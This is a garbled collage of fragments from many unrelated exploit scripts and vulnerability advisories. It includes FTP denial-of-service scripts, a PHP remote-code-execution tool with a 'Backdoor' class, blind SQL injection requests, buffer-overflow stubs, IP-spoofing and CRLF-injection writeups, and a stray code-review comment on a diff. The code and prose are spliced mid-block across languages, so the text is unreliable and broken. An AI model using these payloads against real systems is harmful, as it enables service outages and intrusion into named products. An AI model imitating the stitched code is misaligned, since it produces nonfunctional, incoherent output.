#!/usr/bin/python
import socket
import sys

def Usage():
    print ("Usage: ./expl.py <serv_ip> <Username> <password>\n")
    print ("Example: ./expl.py 192.168.48.183 anonymous anonymous\n")

if len(sys.argv) <> 4:
    Usage()
    sys.exit(1)
else:
error_reporting(0);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 5);
if ($argc < 5) {
    print "-------------------------------------------------------------------------\r\n";
    print " BellaBook Admin Bypass/Remote Code Execution\r\n";
    print "-------------------------------------------------------------------------\r\n";
    print "Usage: pheap.php [OPTION] [HOST] [PATH] [USER] ([COMMAND])\r\n\r\n";
    print "[OPTION] = 0 = Credentials Disclosures\r\n";
    print "           1 = Remote Code Execution\r\n";
// gratz: magrinho_loko, ne0h, mental_way, dr4k0 and those I forgot
ini_set("max_execution_time", 90000000);
set_time_limit(0);
define("NEW_LINE", "\n\r");
define("CMD_DIR", 'c:\\windows\\system32\\cmd.exe');

class Backdoor
{
    var $exec;
$result = update_bhdb("users", array("password"=>md5($password)),
array("username"=>$username));
# The _bhdb functions return false for success.
return true;
-}
\ No newline at end of file
+}
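Review bot: `$result` from update_bhdb() is assigned but never checked before `return true;`, so a failed password update is reported to the caller as success. Since the comment states that the _bhdb functions return false for success, derive the return value from it instead, e.g. `return $result === false;`.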
diff -u -r bytehoard-2.1-epsilon/includes/auth/ldap.inc.php
bytehoard-2.1-zeta/includes/auth/ldap.inc.php
--- bytehoard-2.1-epsilon/includes/auth/ldap.inc.php 2006-02-22
16:11:14.000000000 -0300
----------------------------------------
Cisco Bug Id - CSCTA04885
Affects - Cisco CSS & ACE
A second weakness manifests itself on the CSS and ACE through the
different interpretation of HTTP newline sequences between the content
switch and commonly used web servers. RFC 2616 [3] defines the US-ASCII
carriage return/line feed (CRLF) sequence as the end-of-line marker for
protocol elements (excluding the entity-body). Indeed, the CSS and ACE
appear to adhere relatively closely to this requirement.
If you can log on to the server successfully, take the following steps and the FTP server will crash, which leads to a
denial of service:
1. sock.connect((hostname, 21))
2. sock.send("user %s\r\n" % username)
3. sock.send("pass %s\r\n" % passwd)
4. sock.send("PORT 127,0,0,1,122,107\r\n")
5. sock.send("APPE " + test_string + "\r\n")
6. sock.send("DELE " + test_string + "\r\n")
7. sock.close()
Details:
If you can log on to the server successfully, take the following steps and the FTP server will stop responding:
first socket connection:
1. sock.connect((hostname, 21))
2. sock.send("user %s\r\n" % username)
3. sock.send("pass %s\r\n" % passwd)
4. sock.send("PORT 127,0,0,1,122,107\r\n")
5. sock.send("APPE " + test_string + "\r\n")
6. sock.close()
#!/usr/bin/perl -w
use LWP::UserAgent;
# scripts : SunShop Version 3.5.1 Remote Blind Sql Injection
# scripts site : http://www.turnkeywebtools.com/sunshop/
# Discovered
# By : irvian
# site : http://irvian.cn
# email : irvian.info@gmail.com
print "\r\n[+]-----------------------------------------[+]\r\n";
s1.connect((sys.argv[1], 21))
s2.connect((sys.argv[1], 21))
s3.connect((sys.argv[1], 21))
s4.connect((sys.argv[1], 21))
print ("[*] Sending evil stuff...")
s1.send("USER " + buff1 + "\r\n")
s2.send("USER " + buff2 + "\r\n")
s3.send("USER " + buff3 + "\r\n")
s4.send("USER " + buff1 + "\r\n")
print ("[*] Success! The server should now be inaccessible")
s1.close()
If you can log on to the server successfully, take the following steps and the application
will stop serving requests:
1. sock.connect((hostname, 21))
2. sock.send("user %s\r\n" % username)
3. sock.send("pass %s\r\n" % passwd)
4. for i in range(1, 20):
       sock.send("SITE INDEX " + "a"*30*i + "\r\n")
5. sock.close()
struct sockaddr_in sock;
struct hostent *host;
memset(&sock, 0, sizeof(sock));
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if(!(host=gethostbyname(server))) return -1;
    'application/mspowerpoint' => 'ppt', 'application/powerpoint' => 'ppt',
    'application/vnd.ms-powerpoint' => 'ppt', 'application/x-mspowerpoint' => 'ppt',
    'application/x-excel' => 'xsl', 'application/pdf' => 'pdf');
if (!array_key_exists($filetype, $known_photo_types)) {
    echo "<p class=\"error-alert\">".$LANG['err_not_doc1']." $filetype ".$LANG['err_not_doc2']."<br/>".$LANG['err_not_doc3']."</p>";
    return false;
} else {
    copy($filetmpname, "gallery/documents/$filename");
    return true;
36| $ip = getenv( "REMOTE_ADDR" );
37| }
38| else {
39| $ip = "UNKNOWN";
40| }
41| return( $ip );
42| }
So an attacker can spoof his IP: he just has to create
an HTTP packet, add a special header, and send it. The
HTTP packet will look like this:
manipulate account databases on the target resources. In the case of
*NIX-based systems the management server remotely logs in to a target
server and issues a series of shell commands, using a send-expect technique.
The system allows users to submit passwords containing control
characters including new line (ASCII 0x0A). The implementation of the
send-expect mechanism fails to handle such passwords correctly. This
flaw allows an unprivileged Sun IDM user to execute an arbitrary UNIX
shell command by requesting a password to be changed to a specially
crafted value. The injected command will be executed with root
privileges on all UNIX systems the user is provisioned on.
Details
=======
Many scripts for various IRC clients that report the name of the currently
playing song in a media player on IRC share the same security bug. They don't
sanitize the name of the song before sending it to the IRC server. When a
user plays a song with a newline (LF or CR, which are both message separators
in IRC) in the name of the song, and uses such a script, the text following the
newline will be interpreted by the IRC server as another command.
Exploitation requires the attacker to trick a user into playing such a
specially crafted song, and then to use his script while the song is playing.
That makes it hard, but not impossible, to exploit in practice. It results in
TransferSock = 0

def sendDirList(sock):
    (DataSock, Address) = TransferSock.accept()
    print "sendDirList: TransferSock accepted a connection"
    sock.send("150 Opening ASCII mode data connection for file list\r\n")
    DataSock.send("-rwxr-xr-x 2 ftp ftp 4096 Aug 1 02:28 st\\..\\..\\..\\..\\..\\..\\BackSlashPoC\n")
    DataSock.close()
    sock.send("226 Transfer complete.\r\n")
    print "sendDirList: Transfer complete\r\n"
        { $result .= " " . $string[$i]; }
        if (strlen(dechex(ord($string[$i]))) == 2)
            { $exa .= " " . dechex(ord($string[$i])); }
        else
            { $exa .= " 0" . dechex(ord($string[$i])); }
        $cont++;
        if ($cont == 15) { $cont = 0; $result .= "\r\n"; $exa .= "\r\n"; }
    }
    return $exa . "\r\n" . $result;
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)
are not properly sanitized when checking the destination filename. The
problem resides in the Notes feature implemented by tb2ftp.dll loaded by
the tb2pro.exe. This is the main issue.
2) Log input manipulation (CVE-2008-1118): Several fields of the packet
containing peer information (computer name, user name and IP address)
are taken from the packet sent to the target and used to display this
information on the screen of the target.
The vulnerabilities discovered allow a remote attacker to upload a file
to an arbitrary location on the victim's machine and forge peer
its features can be found at http://www.monkey-project.com/about.
Monkey (up to and including version 0.9.2) employs an insufficient
input validation method for handling HTTP requests with invalid
connection headers. Specifically, the vulnerability is in the
calculation for the end of the request body buffer related to newline
characters in function Request_Find_Variable() in the file
src/request.c.
With a specially crafted request body the pos_init_var integer can take
the value 0x1c (28 in decimal) and the pos_end_var integer can take the
payload into the remote process despite the buffer's small size (268
bytes). This was done by overwriting the ret value with part of the
Meterpreter payload.
- Explanation of Process:
http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/
- Vulnerable Program:
http://easyftpsvr.googlecode.com/files/easyftpsvr-1.7.0.2.zip
- Exploit Download:
https://tegosecurity.com/etc/return_overwrite/RCE_easy_ftp_server_1.7.0.2.zip
print "[+] Sending request...\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
print $socket "USER AA AA AA :AA\r\n";
print $socket "NICK " . "\\" x 200 . "\r\n";
sleep(3);
close($socket);
<?php
$apaddr = "192.168.2.1";
$apport = "1723";
$con = fsockopen($apaddr, $apport, $errno, $errstr);
if (!$con) {
    echo "$errstr ($errno)<br />\n";
} else {
    $trash = str_repeat("\x90", 261);
    fwrite($con, $trash);
sub usage {
    print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
    print "by kcope in 2009\n";
    print "usage: perl apache-ied.pl <remotehost> <webdav folder> [username] [password]\n";
    print "example: perl apache-ied.pl svn.XXX.com /projects/\n";
    exit;
}
if ($#ARGV < 1) { usage(); }
[+] Code
- [A] Blind SQL Injection
POST /path/modules/comment/post.php HTTP/1.1\r\n
Host: site\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 177\r\n
===============
1) Introduction
===============
Sick of junk email? Bored of all email programs looking the same? Take a look at Eureka Email and see how different things could be...
Eureka Email has a built in junk email filter which can remove about 95% of your spam and it continually learns as it comes across new junk emails. You can customise the program so each of your friends has their own icon and sound for when they send you an email. You can also set up special accounts for your children so that they never get to see sexually explicit or offensive junk emails.
(from Eureka Mail website)
        $sock = fsockopen($host, 80);
    }
    fputs($sock, $packet);
    while (!feof($sock)) $resp .= fread($sock, 1024);
    fclose($sock);
    return $resp;
}

function upload()
{
    global $host, $path;
use IO::Socket;
my $server_ip=$ARGV[0];
my $server_port=$ARGV[1];
my $username=$ARGV[2];
my $password=$ARGV[3];
my $command=$ARGV[4];
my $buffer=$command ." " ."\x41" x 10000 ."\r\n";
if(($#ARGV + 1)!=5)
SQL INJECTION VULNERABILITY --AlumniServer v-1.0.1-->
---------------------------------------------------------
CMS INFORMATION:
-->WEB: http://www.alumniserver.net/
-->DOWNLOAD: http://www.alumniserver.net/
-->DEMO: N/A
-->CATEGORY: CMS/Education
-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools
and companies. Services for users include profile page,...
Let's look at the code:
Filename "includes\functions.inc.php", line 36:
## Get Client IP Address
function get_ip_address() {
    ## New line added for cluster/cloud type hosting e.g. Mosso
    if(isset($_SERVER['HTTP_X_CLUSTER_CLIENT_IP']) && !detectSSL()) return $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'];
    ## Otherwise use standard IP checks
    $address = false;
    if (isset($_SERVER['REMOTE_ADDR'])) {
Not needed.
One only has to call
"/screens/frameset.html"
and provide Basic Authentication data which uses
a username and password longer than 63 characters each.
The following header worked for me:
Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0